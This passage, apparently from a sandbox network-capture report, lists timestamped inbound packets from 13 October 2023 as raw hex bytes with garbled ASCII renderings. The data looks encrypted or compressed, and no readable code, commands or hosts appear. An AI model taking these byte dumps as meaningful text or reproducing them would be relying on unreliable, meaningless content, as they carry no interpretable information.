a5 e3 8f 1e 0e 4b 29 a9 80 e6 cf f7 30 4b 8d 9d 75 3d d2 cb 44 a8 8a 48 dd 2f Data Ascii: 6-WLjWwo6C3@;(V'FHh +0cu%l7M5xBFaw_vGu/,Ma)fSTdToUz]]HM7?-y tj<p}/rL#g(66trT.8Nr;KkK)0Ku=DH/
2023-10-13 13:21:16 UTC	10206	IN	Data Raw: f9 3e 88 d0 83 fd b7 f7 8a 39 ce 52 0e c6 4e 87 ed b5 31 df 86 b7 d3 08 a4 1c 2d 8a 59 9f d7 37 6e fe 37 4e c9 8e 99 b8 8f d7 5a a7 55 3c ef 0e 16 8d cb 71 35 10 74 ce 78 f6 4f e7 50 5e 4a 41 71 5d 4a d3 43 ba 81 e6 46 bb c6 59 3c 19 a3 4a ac d9 d7 14 53 1f b3 6e 49 b4 2a 42 ac a3 a6 9f 0e ed d2 95 49 02 74 0a 8a 70 b3 b2 8b ba 39 24 0f 5e a2 47 b5 2d 6d cb ba 2d ea f9 dd ca 21 a6 57 e8 1d 0d c8 fb d3 20 9c 63 d0 c3 aa 24 38 f2 66 dd 8d 63 fe 15 f1 f2 b8 30 01 e6 fe e7 dd c0 4a 14 1b ff fa 10 35 01 5d f5 b2 05 dd 66 eb 36 c3 02 b8 a5 0d b3 0e 32 6b c3 36 da 33 1f b4 04 f7 ab f1 69 05 d4 f6 bb cf 55 21 bd fb bd ca c0 6b f2 d7 32 fa dc d7 ec f0 a6 95 04 23 69 a8 e6 a8 d8 01 c3 26 35 5a 4a ee 58 c3 95 33 af 11 71 b5 d8 25 dd 16 0e 42 71 d3 76 11 3e 94 77 64 Data Ascii: >9RN1-Y7n7NZU<q5txOP^JAq]JCFY<JSnI*BItp9$^G-m-!W c$8fc0J5]f62k63iU!k2#i&5ZJX3q%Bqv>wd
2023-10-13 13:21:16 UTC	10222	IN	Data Raw: bf 15 20 a2 46 7d 6e 1c e7 28 ba be ef ea ba e5 d6 ea 23 66 1f 3c 39 6f 31 81 51 71 42 3d 05 d7 f8 15 ce 6c a3 57 88 7e c8 4f 90 7e 20 f3 88 e4 95 23 62 ce 05 4f 45 36 4d a0 33 3c 11 e2 32 34 d8 a6 f9 b5 77 3a e9 fc fd 86 b3 3e 1f e1 fd 51 73 ee e8 26 e9 d0 67 ed e9 44 d5 e6 59 c3 bc 20 cd 3e 48 7b bc ab ea 1b df 61 50 dd 7a 3f db 5c b9 29 1a 47 d9 3a d5 d1 27 ec 8e dc 42 a1 38 26 8b 2f 28 3b 9a ed 94 88 4c a7 c7 82 fd b9 5b 8f aa 14 a9 60 2d 31 d8 e5 e2 a6 f0 fd d2 d5 0c d2 90 9c 98 05 74 0b 3b 99 43 b8 7c 5e 8c dd 74 0d 33 57 9e 7a 3c 89 c7 ba 04 e6 09 06 de 17 61 9d c7 bd 14 91 27 bc cf e7 8c 52 2f ed a6 a6 14 d5 34 59 b4 94 40 ff b3 5e db 8c 5f 76 b3 95 78 78 a3 99 f5 ef da d3 ff 43 91 56 13 23 e1 03 39 5a a9 4f 7b dd 4e dd 22 21 1b 12 c0 8f 66 ce 31 Data Ascii: F}n(#f<9o1QqB=lW~O~ #bOE6M3<24w:>Qs&gDY >H{aPz?\)G:'B8&/(;L[`-1t;C\|^t3Wz<a'R/4Y@^_vxxCV#9ZO{N"!f1
2023-10-13 13:21:16 UTC	10238	IN	Data Raw: 07 3a 3e 98 d3 7d 9d a5 9a 67 27 97 17 fe ce ba 6e 03 71 f4 78 b9 35 69 fc 92 bf 41 86 1c 44 76 50 2f 85 46 1b 45 d8 0d 62 15 bc fa 19 18 42 6a 9a 89 58 2e 72 e4 6d 52 be e4 dd f3 fa 2b d0 17 d0 67 30 f1 92 a8 b0 c3 d5 39 2c db 15 e2 45 24 ca db c7 bd 95 5f 36 a9 55 41 ae ae bb 6f 1d 1b 71 4c 61 8f 33 69 c7 e5 ac ad f6 d4 e7 b3 fe b1 01 b3 bc 95 f4 6f 5b e5 4f fd 79 7e ac 4e 08 25 60 73 4b 18 68 64 67 49 da f8 48 c8 f4 d4 27 b0 84 38 0e 0c 7f f2 fd d8 38 40 d1 39 3f 04 f8 ca 6c de 1f 77 72 87 22 f9 20 2f 48 5b 06 79 42 14 34 24 cb 8a 1d 14 44 d0 eb 16 30 d5 16 3a 1d 0f 5e 98 d9 64 3c b1 92 88 d1 90 3f 60 4b 69 8f c7 c0 82 8c 6a 14 18 3c 82 45 4d 7e 27 14 6e c3 bf af 9e 0a 95 a3 fd c0 df 25 40 0f 36 29 7f 3b c7 48 3c 5e 62 c1 f8 db a2 cd e3 08 af 2f 53 76 Data Ascii: :>}g'nqx5iADvP/FEbBjX.rmR+g09,E$_6UAoqLa3io[Oy~N%`sKhdgIH'88@9?lwr" /H[yB4$D0:^d<?`Kij<EM~'n%@6);H<^b/Sv
2023-10-13 13:21:16 UTC	10254	IN	Data Raw: 05 1d ed ee b8 50 91 16 b5 00 e5 4d ef b5 b1 a5 00 06 7d 4e 72 73 72 ef 8a b7 e3 ac 50 37 04 f2 32 16 d6 66 ba d7 29 ba 20 0d ee 71 75 df 1d 52 65 16 2c 12 be bc 2d 04 22 b5 af fe 46 ce 6c d4 e0 d6 85 6a f2 04 73 19 fb f5 f7 96 a8 a1 58 86 cd 8e 42 a6 5e 26 9c 2d 3a 6c e7 01 31 de a0 ce b4 7d 6c d6 36 99 9c 2d c5 2c 59 26 21 23 ca 4a ad 8e 0b 5e c8 b9 50 75 9d 29 78 b6 70 6f 4b b0 ea 2d a2 c9 e9 60 67 fd 57 01 84 60 cc 99 2e 16 9b eb fc 5f 32 72 f7 d5 00 2f b1 84 04 83 e0 9e 0d 9a 7f de 8e 0f 1e 2e 39 c1 49 6f 4d b8 9a 6b 66 c5 ac 2d e8 bd 95 35 ee 4d 56 b5 7d a0 d3 a6 6f 2b 96 ff 5a 9c 08 ef a0 ab ef 48 04 99 75 92 c8 3f f7 88 f7 5b 84 67 ca bf d6 13 7e 92 f0 ec f4 88 39 6c d5 ea 09 b5 98 ab af 9d 54 c4 b6 69 1d 4e f7 3a f1 f3 4b ee d4 60 e2 a1 ad 2d 6f Data Ascii: PM}NrsrP72f) quRe,-"FljsXB^&-:l1}l6-,Y&!#J^Pu)xpoK-`gW`._2r/.9IoMkf-5MV}o+ZHu?[g~9lTiN:K`-o
2023-10-13 13:21:16 UTC	10270	IN	Data Raw: 5c 7d 9e bc 05 15 17 34 db 2d 2f 05 a5 c2 f2 56 ef 5a ea 63 13 e5 f8 7d 30 f4 ae d7 9d b9 d0 47 c4 e1 21 3d 87 9c 84 da 28 dd 25 a4 16 73 8d 26 81 ce 1a d0 38 a9 b0 75 91 ff 01 22 04 ce 5f 4b 64 60 a0 42 b8 fd b1 03 fb 7c 6f 8d 0f 24 62 3e 08 d0 e7 2e 23 78 45 4f a6 a5 04 f1 3d 9a 18 23 25 5a a2 e4 20 66 51 74 48 7c 7d 10 f3 a7 dc 03 b0 a2 42 5c cd 5a 91 9b 53 22 21 01 82 fe a7 1e af 31 bf 99 00 06 5f 55 bf 0b 18 ca 6b cb f7 fc a8 2c 81 f8 64 cc 16 72 e7 2e b3 f0 d6 46 0a af 03 9c 58 05 99 cd 7c f4 c8 b1 f8 96 a4 70 0d ad 3c ce 3d f1 70 f7 cc 70 8e 9b d0 34 53 1c a4 b7 db 09 84 8e 9b 18 6a d1 f8 5d cf 3c 22 30 02 df 9c 8f c0 f6 90 57 21 31 db 99 b0 56 e9 a3 ed a3 c8 1b 3c fb 6d b2 db 4d af c3 b2 16 4f 98 b0 4d 56 69 e8 7d ae 22 a9 c1 a6 94 00 4b 99 e2 e1 Data Ascii: \}4-/VZc}0G!=(%s&8u"_Kd`B\|o$b>.#xEO=#%Z fQtH\|}B\ZS"!1_Uk,dr.FX\|p<=pp4Sj]<"0W!1V<mMOMVi}"K
2023-10-13 13:21:16 UTC	10286	IN	Data Raw: 13 76 b8 26 77 f4 d7 cc 06 e1 4d 95 22 c3 42 2c 56 96 1a b3 85 19 14 4b 1f d3 dc 90 00 89 cf ab e3 8f fc 85 6d 5d 6e c1 7a 54 48 96 46 56 93 23 3d c6 b3 88 30 ba 09 69 88 02 5d 38 92 68 f5 62 12 be ed b5 67 a6 0b 6c 03 6b cc 76 7b 81 e0 2f 8f 6c ca ee 8c 29 46 c3 0a c0 f8 dc 07 60 67 e2 85 38 a4 2b af 46 7f 00 58 2e d7 ed 2f 46 ff d5 78 29 fa 3c 5c e5 8d 30 95 4f f0 45 fd 32 87 1b 9d 68 f1 ee 68 b6 5f de 19 60 74 a2 d1 a8 d6 f5 04 3c 7a bd 93 cd 38 26 71 4a df a0 f6 b4 b9 0e fd 24 59 46 95 8a b3 dc b5 d8 34 5c a6 8c 02 ac 9f 17 35 16 a0 eb 33 d3 19 e2 bf 8c 37 4f 82 90 4e 94 78 25 9e 10 f5 76 5a 1b ee 40 95 ff 6d 66 ab 49 99 52 2b 21 b1 dc c4 e1 f0 79 20 b7 74 dd 10 66 71 58 1f 86 29 dc d9 42 d6 b4 bc 7e 2c b0 74 a3 59 09 64 82 71 9d ab cd 9f 25 31 0f 93 Data Ascii: v&wM"B,VKm]nzTHFV#=0i]8hbglkv{/l)F`g8+FX./Fx)<\0OE2hh_`t<z8&qJ$YF4\537ONx%vZ@mfIR+!y tfqX)B~,tYdq%1
2023-10-13 13:21:16 UTC	10302	IN	Data Raw: 11 9d fe 03 31 cf 87 74 59 f8 f1 90 bb b0 e7 68 c4 ea 72 90 7b 7c d3 d0 24 de ab 52 7e 49 70 be e4 f0 26 b2 8a 03 43 d0 9a 07 1a 5d 10 28 f0 cd dc b2 7c 32 87 f7 d8 e7 ec 74 b1 31 f7 45 a1 21 77 78 27 91 1b b2 43 76 20 4d 7d 17 7b 1d f7 30 b0 ca 9b 51 56 45 89 ee a7 79 89 65 36 2f 90 26 ad 04 63 52 3b fa 4e 4f 5c db cd 1f 90 85 e0 28 6c ae f5 d3 c4 bd 41 7d fd 73 79 0c 36 1d 43 4c 6c 4f 03 78 77 4c 7f 53 0b 6e 79 7c ef f0 36 4b be 27 5d 0a 9d ea 1a 70 5c c1 31 84 92 ff da 91 9f 21 50 76 a1 00 62 bb b5 22 f1 bd 3d e7 2f 10 66 62 39 7b bb f3 5b 1b af 9b ec e3 1e c3 75 db 07 e7 63 ba 4d 62 c4 3f 5b 2c 1b 89 3c d6 f9 71 95 51 02 ce 29 7c 11 65 32 1a 78 09 22 ee c3 91 f3 7e 55 8d 72 fc 20 a8 70 19 b4 79 1d e5 4d 7d 15 4c d7 ae 49 3e 35 e2 cd 80 39 2b 27 bb e2 Data Ascii: 1tYhr{\|$R~Ip&C](\|2t1E!wx'Cv M}{0QVEye6/&cR;NO\(lA}sy6CLlOxwLSny\|6K']p\1!Pvb"=/fb9{[ucMb?[,<qQ)\|e2x"~Ur pyM}LI>59+'
2023-10-13 13:21:16 UTC	10318	IN	Data Raw: fb 16 d4 4a 42 10 bc 55 91 5a b4 fb 5b 2d 77 91 4b a5 a9 25 dd 2d c6 18 ca 94 60 c7 c9 4f 5a 22 86 11 90 79 75 36 1f 29 e3 6b 91 7e 53 4a 6d 5d 2d 4a 4f ac 23 be 71 67 25 a7 0f 68 3d 70 b9 4b dc 64 d2 4a 9f 1e 09 cc 67 46 c6 9a f3 53 cb 03 ac ba d6 a3 b4 04 bb 27 d3 15 61 a8 59 b2 d1 46 17 5f 23 cd 52 05 a0 47 cd 9e b6 ed ef 1c 5c 1b 8d ba a1 49 5a 45 c0 dc 6a 22 fd ff 3c 13 1c 73 29 6d fe 7c b1 03 24 2d 3d d7 76 34 a1 3a 52 a4 c9 be 21 65 42 d7 4c 75 24 1d aa 13 f2 12 d3 ae 6d f7 ba 3a d5 89 4e e6 be 86 63 81 fa 91 9d 33 42 dc bb 22 62 ea c9 dc 2a 06 01 f0 44 72 03 a2 6e 8e 0f 13 2c 15 4c ef a2 23 68 67 eb ad ed 4b 5e ec 48 cd cf 3a 75 a8 04 2f b7 55 ab ff da 06 2a ca 3f a3 20 d2 43 83 22 c5 b1 2d fb 8f cc da 39 8c 0c df 1d 28 0f ee b2 cf e9 af d2 25 e6 Data Ascii: JBUZ[-wK%-`OZ"yu6)k~SJm]-JO#qg%h=pKdJgFS'aYF_#RG\IZEj"<s)m\|$-=v4:R!eBLu$m:Nc3B"bDrn,L#hgK^H:u/U? C"-9(%
2023-10-13 13:21:16 UTC	10334	IN	Data Raw: 65 ef d8 eb 10 12 d3 f9 af 79 cd be 97 f6 2b 60 0b b0 bc aa 65 8e a2 e1 6d aa bd 53 a3 73 6e 9a b4 12 b5 e0 84 23 7d df a7 a4 14 2e b6 b9 0c 01 a6 b8 65 53 28 fa fd ed e2 f1 8a c8 b1 1a 50 9a 12 6e 66 cd e8 09 ea 31 a1 93 53 40 9a 48 3f 3e 8d 23 26 b3 06 cc c3 dc 8c 51 18 a2 eb 4d ab 0f 17 68 68 a9 b6 6a 14 6c 81 4a 3c 49 82 35 ec f2 12 0d 2b de e7 18 dd 68 9e b0 7e ee 29 53 87 5a 30 de 84 84 c7 28 0e d7 46 c1 6d 7c 2a 97 14 dd c6 9f 6a 11 e0 5f 97 de f6 d4 5d 27 f3 98 19 a2 56 c6 64 e5 73 2d 49 23 80 db d0 f2 cc 87 be 3d b4 8a dd dd dd 5c f6 aa 8d 18 08 9b 2c dc 54 ca cc c9 c9 40 8b 21 58 05 75 1a c3 b7 54 88 ea e7 2b fa f6 b4 75 b3 12 61 d1 23 67 c4 6e 51 40 bf 7c 41 0c a8 97 35 21 4b 32 65 22 cb 49 84 0a a0 92 4d 5c 4a b3 ee 7d 42 f1 20 35 54 24 e1 96 Data Ascii: ey+`emSsn#}.eS(Pnf1S@H?>#&QMhhjlJ<I5+h~)SZ0(Fm\|*j_]'Vds-I#=\,T@!XuT+ua#gnQ@\|A5!K2e"IM\J}B 5T$
2023-10-13 13:21:16 UTC	10350	IN	Data Raw: 33 ab f8 0e 67 91 f4 0e c8 90 c8 2e 8b 9f 82 d0 7e 54 7f 04 5f 3e d0 f8 07 3e 13 c1 d8 9d 40 60 0f c7 67 87 12 a1 db f6 dc 91 8a 2c 07 1b 6e 74 4e 69 01 9b 55 0e 97 cb 8c d0 4a a0 9a 61 9a 85 b8 8f 9d d5 ec 7c 7a 37 63 52 af c2 2b d4 99 78 10 55 84 25 1b be 2f fe ec 6d d6 4d 7e 02 cc cd 30 9e 5d a2 a1 d2 cf a7 1b cb 8d 83 f7 0e 57 d5 96 c4 f0 ad 4e 20 77 95 98 c1 f0 9d c3 de 2a 9e a2 46 89 de 66 07 ba 7b e1 4f 57 38 63 35 f5 71 a0 b4 a9 1d 1d 56 fa d3 97 9a b6 91 56 26 3e 59 47 3f 15 8d 85 0f 02 ba 28 48 7a 8b fe 14 79 04 f9 9e 66 96 a8 b3 cc c9 52 42 5d 23 3c 57 b5 4b d1 d1 c1 2d 21 64 f0 b8 67 84 79 2b 85 8b 20 f6 e5 4c 73 04 98 f3 48 6b 1d ff 7a 51 1b d9 86 11 38 9e 0f 2b 79 ec f8 7e fb c2 f7 76 a2 4c 7a cc 94 49 0f 71 d7 f1 b8 b4 e6 02 60 fb 35 d5 21 Data Ascii: 3g.~T_>>@`g,ntNiUJa\|z7cR+xU%/mM~0]WN w*Ff{OW8c5qVV&>YG?(HzyfRB]#<WK-!dgy+ LsHkzQ8+y~vLzIq`5!
2023-10-13 13:21:16 UTC	10366	IN	Data Raw: a0 12 15 d4 4d 05 19 73 cc 7e 40 64 ae 1d 71 a4 ba 7d 57 f5 86 a5 9c 4b 58 d8 52 36 0c 3c 08 f8 43 5b c0 92 90 1f 9e 83 dd b5 07 c6 16 d5 e3 10 d6 b2 be b8 9f 0d f7 30 bb ec bd dc 3b c4 17 15 be b5 ea a7 00 f6 f7 6e f3 ca e6 d6 3e cf 5e 3f 56 16 c0 a1 60 8a 45 1d 8b fb b0 eb 0a 90 fd 25 5e 04 86 ee f7 c8 47 72 2e 18 84 5d 2b 89 6c 97 7a b2 66 01 f2 95 c9 0d ff 55 55 69 01 99 15 4f a9 63 44 58 aa 6a a0 4d 0b ec 49 14 ec ce 3b 8f 51 c2 82 0e fd 04 da b4 9e f5 e8 1d 20 89 18 3b de ce 8e 16 0c b6 5a e9 05 8d cd cd 16 37 c3 bd 1a 16 90 7c ed ba 7b 7d 61 3c 2e 32 10 ab 4c f7 7d f3 0f 42 38 44 3e 0e ec 77 e5 7e ff 86 f1 93 fd 36 38 3d 97 c3 db 28 11 2a 0e ee ec 40 f1 45 0a 9a ee c1 cc 03 35 42 cc 7f ac a6 7e 73 15 c2 ba fa 3f 8d f2 07 1e 1d a3 a0 b1 78 5b fd 04 Data Ascii: Ms~@dq}WKXR6<C[0;n>^?V`E%^Gr.]+lzfUUiOcDXjMI;Q ;Z7\|{}a<.2L}B8D>w~68=(*@E5B~s?x[
2023-10-13 13:21:16 UTC	10382	IN	Data Raw: 00 61 5e d9 dd d7 45 11 dc cd 87 1a b4 a7 f3 1d d0 06 90 ba f2 19 74 95 98 d1 ce 5d a0 71 07 2c e1 32 30 03 b5 41 4b 5b f3 f8 47 b7 15 86 71 81 a4 17 87 cb 26 a1 cb 4e fb dd 24 5b b2 3e 09 3a 43 eb 49 4b da b5 84 5c 90 f0 c5 c1 50 eb e8 03 b0 59 6d 6d 74 c3 6a 5d 17 49 c3 ea 20 07 48 b2 23 23 51 a0 69 cd 05 3f 40 f9 10 cb e2 39 63 9b da 88 c2 ac b5 64 0b b1 53 2a f0 b0 c5 9b c7 af 3c 6d 33 ef e3 49 01 f5 2b cf 67 5e 49 67 96 50 17 04 46 bc 4e 42 53 06 93 cd d0 10 de f1 d3 af fa 9f c1 a7 a9 ac f7 40 d2 61 e8 ea 10 2c 46 9c 50 b2 9e f7 ed 29 a7 fa ae 99 95 62 4b 75 86 46 a5 6f 0f e7 cb 47 c5 b9 dd 16 a3 dd 16 f5 a0 5d 93 57 85 9d 94 c6 91 c8 80 f6 9a 25 e3 67 33 14 6e 8a 2b 52 63 d4 0d ff 93 5b c3 98 fe 9d b7 a5 a0 d2 18 f6 5b 51 f2 3d 2a f3 e3 81 3c 75 27 Data Ascii: a^Et]q,20AK[Gq&N$[>:CIK\PYmmtj]I H##Qi?@9cdS<m3I+g^IgPFNBS@a,FP)bKuFoG]W%g3n+Rc[[Q=<u'
2023-10-13 13:21:16 UTC	10398	IN	Data Raw: d6 78 bc b9 5a ce a2 64 5d 68 fd cb ca a9 ae 85 38 53 9b d4 86 b0 31 55 0f 43 1e 3f da 9d 6f 2b 28 94 fd 17 e4 55 48 e3 a7 80 05 70 f0 4b 58 b6 c2 d6 de 1d 50 d6 0f bf 67 b8 60 e6 c2 22 aa 73 85 9c 47 1d 87 b9 27 5c ce 3d 11 65 1e 00 c3 bf 21 fb 25 db 80 79 a3 02 76 3f 85 bd 1d bc df b0 ce b3 60 7f 1e 01 08 7f 94 48 cc 87 c9 3f 4f cc c6 a1 2a 13 0a 7f c0 3d 7e 8a 0d 13 bc cf a5 d2 75 2c 68 b9 06 8b 6e 8d 13 d8 6e 44 9b 0d 0e 59 32 82 33 a7 10 2a 09 6c cb be e6 4b 07 09 61 55 28 6a f1 fc 55 b4 b4 09 30 b0 39 0c 48 f8 3b 40 9c d9 df 5b 2d c2 7f ae 31 cd e1 96 bc 45 6a c0 9d f3 ec 90 4e eb 93 d8 fd 13 2a 59 30 79 9c b7 e8 71 0b 69 a7 70 4f 0a ec f9 9d e5 22 ba dc 73 02 30 72 71 38 05 e2 67 4f 32 d3 ee 30 57 18 28 91 80 9d c1 98 94 ee 91 f2 ea 6f 19 75 5a 9a Data Ascii: xZd]h8S1UC?o+(UHpKXPg`"sG'\=e!%yv?`H?O=~u,hnnDY23lKaU(jU09H;@[-1EjN*Y0yqipO"s0rq8gO20W(ouZ
2023-10-13 13:21:16 UTC	10414	IN	Data Raw: 74 e5 f4 9a 6f ee 5b c4 ac d8 bf 44 72 6f 21 76 73 83 2a e2 4c 54 01 4d c5 69 54 7e aa 7d 70 dd 54 52 45 6a 86 de 6a 5a 4b 3c 4b 34 75 38 b5 11 70 00 5a 34 54 30 88 97 d4 ef 7e 9f 8c fa 7b 4a 05 9a 08 0d 25 39 16 f8 0c c0 1e 0c e4 9e d3 26 36 7b 72 09 b7 db 63 e7 2f c5 20 2b 1a 6d 6e ca 3c 91 05 64 5c 2d 43 e3 58 61 c6 6a 03 eb 78 5e 0e 45 1d a0 74 e8 b1 3d 50 51 03 f2 89 42 c0 ef 06 76 97 15 3b 01 b3 fc 62 1f 43 fc a8 1f 98 ee f5 4b 1a 7b fd d6 83 05 b9 14 12 cc b5 88 10 99 e7 ae d8 31 96 61 44 13 95 9c 1d e8 6e 1f 33 36 c3 86 eb 24 7a 51 6f ce 9f ce 6b 1b 5c 9a 93 4b 69 61 62 4b fd 76 f0 95 7d 60 de c5 23 68 44 60 24 c7 ba b6 28 a9 ac 65 d7 f6 99 32 9d 12 ac d3 0d b6 fe 96 aa 00 91 7b 59 d8 12 f5 0b 8d 44 3a 13 0c 49 cc 51 21 09 dd 9c fb 67 af 43 77 d0 Data Ascii: to[Dro!vs*LTMiT~}pTREjjZK<K4u8pZ4T0~{J%9&6{rc/ +mn<d\-CXajx^Et=PQBv;bCK{1aDn36$zQok\KiabKv}`#hD`$(e2{YD:IQ!gCw
2023-10-13 13:21:16 UTC	10430	IN	Data Raw: 4b 97 ef e6 a5 6b 4c 1f bd 41 26 2e b8 f2 51 d7 40 eb c1 76 8b ee e2 2e fa 6e 25 7b b1 a8 c7 5b ec cd b9 a4 e6 d8 fc ef a4 8a e1 47 06 20 fb 64 f8 09 86 f5 42 4d 83 e6 4b 05 b5 02 54 89 75 cd 6e 52 4d 9b fb 6e 13 7e 2c ef 13 f2 a3 b5 82 b4 f8 03 03 13 04 75 f8 13 37 e5 46 16 8f 1d 30 bc 1e 12 6a d8 78 9c d6 ed 7d c4 d0 4d 09 66 1d 27 9f 42 2f dc c3 78 e0 51 e3 75 bf d2 b2 5b 95 b5 1b 04 f5 a9 6e 64 c5 32 7f 32 e1 a6 ed 59 9c ec f9 31 6a 1d ab 88 cf 30 49 2a 6a a7 ab 81 b0 40 76 31 bc 68 df 17 3b fd 6d 3a 92 e2 c0 90 21 0d 98 98 47 e2 85 d3 0d e6 05 5b 47 32 24 4a 33 b5 57 81 13 12 b6 b5 5e bb 01 5c aa fb 8b a7 2e 94 25 85 49 07 70 9b be 3e 0e fa 0e 54 25 fe f8 0a 9b 1f dc 94 54 0b 0e b2 ee 12 78 79 4f 5c b0 0a 4b 75 50 2f 97 91 6b af 86 b1 8f 5b e8 e4 55 Data Ascii: KkLA&.Q@v.n%{[G dBMKTunRMn~,u7F0jx}Mf'B/xQu[nd22Y1j0I*j@v1h;m:!G[G2$J3W^\.%Ip>T%TxyO\KuP/k[U
2023-10-13 13:21:16 UTC	10446	IN	Data Raw: 03 a4 ef 99 bf d8 1d 63 5e 72 02 b9 71 3f c6 8b ff da 1c 6e 01 bb b5 46 4a 3a 06 f1 33 4e f7 ee 66 04 fa f6 69 19 59 5e ab 7d 77 aa 81 dd 04 6f 32 04 83 d4 2b 5f 88 ae 5d 21 66 9f ef eb ec 01 72 70 12 32 19 d0 98 d5 b5 cd 44 4b b2 d5 10 40 88 bf f5 f5 09 d8 84 7b 11 c6 5c fb ac 8e 9e c9 b9 12 6a f5 c7 e8 a8 3f 22 19 5c 2a 2e 34 d9 cc 62 72 16 93 f7 1e 3b 33 e4 f4 d8 64 c1 0d 67 34 da 14 d8 f7 e5 8b 6b 02 fc 75 12 a1 70 22 92 0a e2 a1 80 03 b3 65 07 c0 69 14 03 15 8e e0 19 c5 85 85 8a 4e 72 59 ce 5e fb 72 70 38 0d 72 df 0c 0a de 4e c4 dd 38 71 89 cf c9 34 31 af b3 93 54 55 e4 1e 86 05 7e f1 1e e8 07 6f 3c b5 17 0d 7c 57 03 d5 22 8b 23 07 f0 28 97 21 70 85 e0 dc e7 a4 7b e9 ca 45 2e 85 a5 b2 c9 2b c3 07 1e 88 36 62 20 fc 5b 7a ae fa d4 bd 4a ea 34 88 a4 20 Data Ascii: c^rq?nFJ:3NfiY^}wo2+_]!frp2DK@{\j?"\*.4br;3dg4kup"eiNrY^rp8rN8q41TU~o<\|W"#(!p{E.+6b [zJ4
2023-10-13 13:21:16 UTC	10462	IN	Data Raw: ea 55 2a d3 13 12 89 1a c4 79 5e 30 e4 b4 f9 60 86 69 38 b9 21 96 86 08 c8 31 e0 90 cc 7e 29 ec 29 34 b1 80 5d 21 20 50 5b e5 37 02 3e 6c ac 16 3c b3 ac de 6a ec de 42 ed d3 52 d6 84 58 18 c9 20 81 26 f2 69 06 2a c5 dc 7a 0a e3 25 7b 45 37 2e 30 8a 78 29 29 2c 61 6e 52 df d8 af 81 cd 87 68 7b 9c 32 a5 b5 24 ab 46 90 bb 47 0f aa be 0d 48 ba d2 6c 59 25 a0 0b ca 76 e9 dc db c6 c8 86 73 f9 13 de e7 3d 55 b7 55 14 52 25 78 64 4a a9 50 66 f1 35 c1 f5 5e f7 8c e2 74 bb 7e b1 61 92 3b cd 30 41 2c eb cd ea f8 09 8a 21 ba d9 8c 62 e0 04 b8 83 00 94 c9 44 e5 da 2b 7f 79 43 94 d5 be f6 30 c0 26 f2 40 d3 4d d7 1c 40 9e 6e 5c f0 e0 3e 28 d8 e1 b3 9c cb 2f 9f d9 24 0d b9 65 a0 bc 53 dc df 05 7c a5 ae 27 19 45 12 e4 de ad ce ef 85 4f f3 0f 3f 69 24 09 46 be 4c 7a 48 ca Data Ascii: Uy^0`i8!1~))4]! P[7>l<jBRX &iz%{E7.0x)),anRh{2$FGHlY%vs=UUR%xdJPf5^t~a;0A,!bD+yC0&@M@n\>(/$eS\|'EO?i$FLzH
2023-10-13 13:21:16 UTC	10478	IN	Data Raw: d3 de 1e c3 df b6 23 b8 f4 be 0a 92 a3 01 93 72 67 6a c9 77 75 74 1e 63 5a e0 64 59 3b c4 e1 8e 21 18 b3 71 c9 49 11 2a ee 60 f9 90 f3 3d 6a 70 be c3 ae 3b 09 a7 0c c4 6b 92 23 c4 15 0a 30 75 c2 a7 17 cf 07 b6 3b c9 d0 85 40 56 2f 23 f2 df 26 bb 79 42 6a 89 d8 07 61 0f be cf 47 16 6e 30 bd ea 0f a6 17 04 f6 82 b7 3f 90 73 b7 46 8e 92 c5 5d fd 27 7b fa 57 e1 34 85 c1 73 a9 20 93 47 5e 8b 51 e2 b7 11 ca 52 96 f1 ce 3e 38 0d 00 0a f5 04 2f a4 51 5d ec 76 ec 9c 54 f5 8c e8 a7 03 5b a7 9f df 1a d3 97 a3 04 4d 1a 70 69 b3 b7 a5 d2 4b c7 f1 4a d7 28 c5 ba 12 ec 76 e1 b0 04 2f d5 94 17 fc f6 ad 46 6a 89 04 97 e2 1f c7 7f 87 3d 91 ac ac 40 59 39 55 8e e8 bd da ed 0b b7 13 63 dc 26 ca 33 d1 d8 7d ff 27 0a 83 3f aa ac 93 85 72 b8 44 17 20 69 9b 46 a7 d9 0b b5 c8 32 Data Ascii: #rgjwutcZdY;!qI*`=jp;k#0u;@V/#&yBjaGn0?sF]'{W4s G^QR>8/Q]vT[MpiKJ(v/Fj=@Y9Uc&3}'?rD iF2
2023-10-13 13:21:16 UTC	10494	IN	Data Raw: be 7b c9 38 18 13 5a 22 f5 27 2a 8b a0 15 f0 c0 67 6c d2 48 b0 cc 3d cb a8 65 3f e4 a3 56 75 65 15 af 40 da 5f ed 22 2d a3 98 fd a2 8a 9e 67 12 8b f2 35 a6 35 85 62 3f 3e b4 8f 86 59 30 50 fd 08 9a b4 e1 3c c3 5b 40 44 c2 c8 8d 9d b8 76 6c 32 53 04 60 7f a7 79 16 2a 92 cf 2c bd 99 99 06 3c b9 da 3f 79 7a cb 43 0b a8 88 96 2c 6e 29 ea 2e cc f1 1d 8c 8e 46 a4 7a 96 42 21 c9 90 f8 cb 96 96 4a 78 f1 1d e6 19 64 8c 3c 15 3c 18 ea 11 83 92 45 56 28 17 75 b1 d5 af 6c a6 bc d2 0f ba d9 bc f1 4c de 3d ed e4 57 a7 30 61 83 e6 2e 88 f0 37 41 d3 a0 f7 ca b3 73 94 1c d9 7c b7 7e 54 1a e8 21 65 6e 2a 2b a8 41 55 94 ed fb 60 b3 10 20 23 fb 6e 4b 77 1a 71 bd a0 c4 8e ad 0e 35 1e 75 54 89 a9 bd b0 d2 71 7f 19 11 35 27 70 73 e8 09 1a 6b 7b aa cc 78 5f 89 e9 4d 34 63 2c f4 Data Ascii: {8Z"'glH=e?Vue@_"-g55b?>Y0P<[@Dvl2S`y,<?yzC,n).FzB!Jxd<<EV(ulL=W0a.7As\|~T!en*+AU` #nKwq5uTq5'psk{x_M4c,
2023-10-13 13:21:16 UTC	10510	IN	Data Raw: 14 df d3 08 60 5f 79 f8 05 62 f9 cb 4d 32 b6 45 78 ba 35 2f b0 c4 ab d0 6e 1b 0b 9e 58 15 0e 02 45 51 30 54 e3 33 95 a4 16 2c 97 d9 40 ec 8e b3 3c 55 3f 5f 38 27 8b df 15 fc 14 5a b4 78 c6 e5 02 84 39 b0 92 53 58 ed e6 22 8b 06 92 73 72 79 31 8e 90 45 07 cc 6b 34 1b 4b e2 6b d0 93 9a 65 15 b1 6d c7 4e e9 76 7a d4 8c b6 a6 f6 7a 85 23 84 66 29 6d 8e d3 66 45 5c b1 8d 35 21 f7 c5 50 9f d5 4e bb fc da eb 12 e2 8f e1 10 8e a0 e5 41 38 5d b0 62 f8 49 ae 84 3e d0 97 96 d6 77 42 88 21 d6 cf 48 2b ad f3 6a 32 81 e2 ce 08 9a fd 43 59 da ac ad 15 be e5 ea cd bf a7 a4 a2 a8 c1 